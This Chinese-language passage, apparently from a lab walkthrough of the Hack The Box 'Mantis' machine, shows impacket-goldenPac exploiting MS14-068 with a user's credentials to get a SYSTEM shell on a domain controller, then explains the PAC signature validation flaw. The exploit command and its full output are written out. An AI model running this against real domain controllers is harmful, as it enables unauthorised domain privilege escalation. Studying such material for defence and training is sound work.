MS14-068 | The Hacker Recipes
这种漏洞允许普通用户无需管理员权限和 krbtgt 用户哈希即可获取黄金票据
┌──(root㉿kali)-[~/Desktop/htb/Mantis]
└─# impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file craJpUBS.exe
[*] Opening SVCManager on mantis.....
[*] Creating service tMrZ on mantis.....
[*] Starting service tMrZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
这是一种非常强大的权限提升技术,但它依赖于一个 2014年的漏洞,因此 无法在已打补丁的域控制器上工作。
之所以会出现这个漏洞,是因为 PAC 签名验证存在错误。这使得攻击者可以制作一个授予用户强大权限的 PAC,而这个 PAC 在密钥分发中心 (KDC) 看来仍然是合法的。
与微软文档中声称的相反,KDC 接受的签名类型不止三种:在 MS14-068 补丁 之前,只要一个签名的长度小于等于20字节,KdcVerifyPacSignature 函数就会认为它是有效的。因此,攻击者可以使用非密钥哈希算法(例如 MD5)来签名 PAC,并使该 PAC 被认为是有效的。